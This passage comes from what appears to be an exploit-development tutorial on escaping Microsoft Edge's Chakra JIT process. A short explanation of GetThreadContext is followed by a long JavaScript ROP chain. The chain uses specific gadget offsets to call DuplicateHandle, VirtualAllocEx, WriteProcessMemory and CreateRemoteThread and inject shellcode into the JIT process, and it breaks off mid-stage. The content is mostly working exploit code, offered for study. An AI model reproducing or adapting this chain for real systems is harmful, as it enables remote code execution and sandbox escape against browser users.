	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

Lastly, we execute our function call and the return value should be to a block of memory which we will use in our call to GetThreadContext.

As part of our next ROP chain, calling GetThreadContext, we will preserve this address as we need to write a value into it before we make our call to GetThreadContext.

GetThreadContext ROP Chain

As mentioned earlier, we want to inject one last item into the JIT process, now that our shellcode is there, and that is a final ROP chain that will mark our shellcode as RWX. As we know, with ROP, we need to have stack control in order to have ROP work, as each gadget performs a return to the stack, and we need to control what each gadget returns back into (our next ROP gadget). So, since we have already controlled a thread (by creating one) in the remote JIT process, we can use the Windows API GetThreadContext to dump the CPU register state of our thread, which includes the RSP register, or the stack pointer. In other words, GetThreadContext allows us, by nature, to leak the stack from a thread in any process which a user has access to via a handle to a thread within said process. Luckily for us, as mentioned, CreateRemoteThread returned a handle to us - meaning we have a handle to a thread within the JIT process that we control.

However, let’s quickly look at GetThreadContext and its documentation, specifically the lpContext parameter:

A pointer to a CONTEXT structure (such as ARM64_NT_CONTEXT) that receives the appropriate context of the specified thread. The value of the ContextFlags member of this structure specifies which portions of a thread’s context are retrieved. The CONTEXT structure is highly processor specific. Refer to the WinNT.h header file for processor-specific definitions of this structures and any alignment requirements.

As we can see, it is a slight misnomer to say that we only need to supply GetThreadContext with an empty buffer to fill. When calling GetThreadContext, one needs to fill in CONTEXT.ContextFlags in order to tell the OS how much of the thread’s context (e.g. CPU register state) we would like to receive. In our case, we want to retrieve all of the registers back (a full 0x4d0 CONTEXT structure).

Taking a look at ReactOS we can see the possible values we can supply here:

If we add all of these values together to retrieve CONTEXT_ALL, we can see we get a value of 0x10001f. This means that when we call GetThreadContext, before the call, we need to set our CONTEXT structure (which is really our VirtualAlloc allocation address) to 0x10001f in the ContextFlags structure.

Looking at WinDbg, this value is located at CONTEXT + 0x30.

This means that before we call GetThreadContext, we need to write to our buffer, which we allocated with VirtualAlloc (we will pass this into GetThreadContext to act as our “CONTEXT” structure), the value 0x10001f at an offset of 0x30 within this buffer. Here is how this looks:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure
);

Let’s see how all of this looks via ROP (with previous chains for continuity):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
